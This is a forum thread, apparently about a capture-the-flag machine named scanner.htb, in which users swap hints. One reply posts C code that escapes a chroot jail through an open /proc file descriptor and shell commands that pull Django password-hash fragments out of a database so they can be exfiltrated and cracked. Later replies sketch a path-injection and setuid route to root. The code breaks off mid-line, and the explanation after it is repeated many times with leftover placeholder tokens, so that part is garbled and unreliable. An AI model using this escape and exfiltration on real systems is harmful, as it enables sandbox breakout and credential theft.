Return to forum

skyweasel · March 19, 2022 at 6:43 AM

Anyone done this one? havent started but would be good to have a nudge

F4nny · April 1, 2022 at 12:04 AM

Anyone can give some hints about sandbox escape?

john2 · April 4, 2022 at 2:52 AM

(April 1, 2022, 12:04 AM)F4nny Wrote: Anyone can give some hints about sandbox escape?

did you get foothold on this tough machine ??

F4nny · April 4, 2022 at 4:18 AM

(April 4, 2022, 02:52 AM)john2 Wrote:
(April 1, 2022, 12:04 AM)F4nny Wrote: Anyone can give some hints about sandbox escape?

did you get foothold on this tough machine ??

Not yet

toatoat · April 23, 2022 at 12:40 PM

for user you can escape through a fd in the procfs mounted in the jail
Then you can exflitrate md5 hash of the user by creating a folder in sandbox/jails directory (which will show in viewer on the website) and bruteforce the name of the dir
Eventually you can jtr the hash with rockyou and ssh with the cred

dkb4rb · April 29, 2022 at 1:47 AM

(April 23, 2022, 12:40 PM)toatoat Wrote: for user you can escape through a fd in the procfs mounted in the jail
Then you can exflitrate md5 hash of the user by creating a folder in sandbox/jails directory (which will show in viewer on the website) and bruteforce the name of the dir
Eventually you can jtr the hash with rockyou and ssh with the cred

I still can't use the fd :[ , a little help please

toatoat · April 29, 2022 at 8:13 AM

(April 29, 2022, 01:47 AM)dkb4rb Wrote:
(April 23, 2022, 12:40 PM)toatoat Wrote: for user you can escape through a fd in the procfs mounted in the jail
Then you can exflitrate md5 hash of the user by creating a folder in sandbox/jails directory (which will show in viewer on the website) and bruteforce the name of the dir
Eventually you can jtr the hash with rockyou and ssh with the cred

I still can't use the fd :[ , a little help please

I don't have the source as I deleted the vm but one of my backup was :

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <linux/openat2.h>
#include <sys/stat.h>
#include <sys/types.h>

int main(int argc, char* argv[])
{
	chdir("/proc/3/fd/3/../../../../../../../../../../../../../../../");
	DIR *realroot = opendir(".");

	umask(0);
	setenv("PATH","/proc/2/fd/3/bin:/proc/2/fd/3/usr/bin:/proc/2/fd/3/usr/sbin", 1);
	setenv("LD_LIBRARY_PATH","/proc/2/fd/3/lib:/proc/2/fd/3/usr/lib/:/proc/2/fd/3/usr/local/lib:/proc/2/fd/3/usr/lib/x86_64-linux-gnu/", 1);
	chdir("/");
	system("export PATH=/proc/2/fd/3/bin:/proc/2/fd/3/usr/bin:/proc/2/fd/3/usr/sbin");
	system("export LD_LIBRARY_PATH=/proc/2/fd/3/lib:/proc/2/fd/3/usr/lib/:/proc/2/fd/3/usr/local/lib:/proc/2/fd/3/usr/lib64:/proc/2/fd/3/usr/lib/x86_64-linux-gnu/");
	system("ln -sf /proc/2/fd/3 .");
	system("export PATH=/bin:/3/bin:/3/usr/bin:/3/usr/sbin");
	system("export LD_LIBRARY_PATH=/3/lib:/3/usr/lib/:/3/usr/local/lib:/3/usr/lib64:/3/usr/lib/x86_64-linux-gnu/");
	system("ln -sfn /3/lib /lib");
	system("ln -sfn /3/lib64 /lib64");
	unsetenv("PATH");
	unsetenv("LD_LIBRARY_PATH");
	setenv("PATH","/3/bin:/3/usr/bin:/3/usr/sbin", 1);
	setenv("LD_LIBRARY_PATH","/3/lib:/3/usr/lib/:/3/usr/local/lib:/3/usr/lib64:/3/usr/lib/x86_64-linux-gnu/", 1);

	chdir("/proc/3/fd/3");
	umask(0);
	
	system("mkdir $(strings ../../malscanner.db | grep md5 | head -n 1 | cut -d '
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
	system("mkdir $(strings ../../malscanner.db | grep md5 | head -n 1 | cut -d '
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
cut -d '
This will select the salt (-f2) and return the first two characters of the salt
cut -d '
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}

This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}

This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f3 | cut -c1-2)");
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5. -f2 | cut -c1-2)");

}
This escape the jail through the open fd, open a new fd at the root of the machine /, then softlink the bin,libs to the jails.
___CODE_BLOCK_PLACEHOLDER_1___CODE_BLOCK_PLACEHOLDER_
md5 hash in django are stored like "md5$salt$hashuser then last log date and user
___CODE_BLOCK_PLACEHOLDER_2___CODE_BLOCK_PLACEHOLDER_
This will select the salt (-f2) and return the first two characters of the salt
___CODE_BLOCK_PLACEHOLDER_3___CODE_BLOCK_PLACEHOLDER_
This will select the hash (-f3) and return the first two characters of the hash
The username is after the hashuser and the last log date, so you have to go to -c50 at least

Then you can create a simple script to bruteforce the name of the dir created in scanner.htb/viewer/$ and exfiltrate the md5.

cyberdiver · June 30, 2022 at 7:18 AM

Hints about root part?

toatoat · June 30, 2022 at 9:01 AM

(June 30, 2022, 07:18 AM)cyberdiver Wrote: Hints about root part?

It's path injection + privesc within the jail.

If you read the source of sandbox.c, there is an obvious path injection but you can't really use it since system() drop file privileges by default (you'll have to specify that forked process inherit priv with prctl() ; that's not the case here).
But you can use it to prepare the jail in a way that you can use setuid bin (the simple ones, not the more complex btw) to privesc within the jail and then escape through the fd.
There's one directory that is really missing in the jail which you can create (and necessary files within it) with the path injection.

For the setuid binary used, don't think about a complicated one. The exploit is not on the setuid bin itself. It's about the environment in which the setuid is in.

cyberdiver · June 30, 2022 at 9:49 AM

(June 30, 2022, 09:01 AM)toatoat Wrote:
(June 30, 2022, 07:18 AM)cyberdiver Wrote: Hints about root part?

It's path injection + privesc within the jail.

If you read the source of sandbox.c, there is an obvious path injection but you can't really use it since system() drop file privileges by default (you'll have to specify that forked process inherit priv with prctl() ; that's not the case here).
But you can use it to prepare the jail in a way that you can use setuid bin (the simple ones, not the more complex btw) to privesc within the jail and then escape through the fd.
There's one directory that is really missing in the jail which you can create (and necessary files within it) with the path injection.

For the setuid binary used, don't think about a complicated one. The exploit is not on the setuid bin itself. It's about the environment in which the setuid is in.

Thanks!